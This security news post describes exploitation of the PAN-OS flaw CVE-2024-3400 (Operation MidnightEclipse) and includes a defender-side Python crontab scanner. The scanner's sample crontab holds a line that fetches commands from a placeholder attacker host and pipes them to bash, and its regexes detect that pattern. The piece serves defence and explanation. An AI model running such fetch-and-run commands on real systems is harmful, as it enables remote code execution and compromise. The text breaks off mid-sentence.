
Threat actors exploited a newly disclosed zero-day vulnerability in Palo Alto Networks PAN-OS software. The vulnerability, tracked as CVE-2024-3400, is a command injection flaw that allows unauthenticated attackers to execute arbitrary code with root privileges on the firewall. The exploitation campaign has been named Operation MidnightEclipse.

How Did It Happen? 

The attackers exploited the flaw to create a cron job that runs every minute and fetches commands hosted on an external server; these commands are then executed with the bash shell. It is suspected that the URL serves as a delivery vehicle for a Python-based backdoor on the firewall. The downloaded Python file writes and launches another Python script, which in turn decodes and runs the embedded backdoor component responsible for executing the threat actor's commands.
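As an added defender-side example (not code from the original post or from any vendor), the following Python scan flags crontab entries that match the persistence pattern described above: an every-minute schedule whose command fetches a remote URL and hands the response to a shell. The crontab text and the domains in it are constructed samples, not real indicators.

```python
import re
from dataclasses import dataclass

# Patterns for the behaviour described in the post: an every-minute cron
# schedule, a download tool, a remote URL, and output piped into a shell.
EVERY_MINUTE = re.compile(r"^(\*|\*/1)\s+\*\s+\*\s+\*\s+\*\s+")
FETCH_TOOL = re.compile(r"\b(curl|wget)\b")
URL = re.compile(r"https?://[^\s'\"|;]+")
PIPE_TO_SHELL = re.compile(r"\|\s*(bash|sh)\b")


@dataclass
class Finding:
    line_no: int   # 1-based line in the crontab text
    url: str       # remote URL the job contacts
    reason: str    # why the entry was flagged


def scan_crontab(text: str) -> list[Finding]:
    """Return one Finding per crontab line that fetches a URL every minute."""
    findings = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        url = URL.search(line)
        if not (EVERY_MINUTE.match(line) and FETCH_TOOL.search(line) and url):
            continue
        reason = "every-minute remote fetch"
        if PIPE_TO_SHELL.search(line):
            reason += " piped to a shell"
        findings.append(Finding(n, url.group(0), reason))
    return findings


# Constructed sample crontab; the hostnames are placeholders, not real IoCs.
SAMPLE_CRONTAB = """\
# constructed sample, not taken from a real device
0 3 * * * /usr/bin/logrotate /etc/logrotate.conf
* * * * * /usr/bin/wget -qO- http://c2.attacker.example/cmd | bash
*/5 * * * * /usr/bin/curl -s https://updates.vendor.example/status
"""

if __name__ == "__main__":
    for f in scan_crontab(SAMPLE_CRONTAB):
        print(f"line {f.line_no}: {f.reason} -> {f.url}")
```

The five-minute status poll on the last line is deliberately not flagged, so the scan can be tuned by adjusting the schedule and shell patterns to what a given environment considers normal.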

What Was the Impact? 

The exact scale of the campaign is presently unclear. However, it was observed that the threat actor remotely exploited the firewall to create a reverse shell, download additional tooling, pivot into internal networks, and ultimately exfiltrate data.

The most interesting aspect of the attack chain is that both the file used to extract the commands and the file used to write the results are legitimate files associated with the firewall. The main goal appears to be avoiding any trace of the command outputs, which requires that the results are exfiltrated within 15 seconds, before the file is overwritten.

This incident highlights the importance of staying vigilant and keeping systems up-to-date to protect against such vulnerabilities. Businesses should ensure they have robust cybersecurity measures in place and educate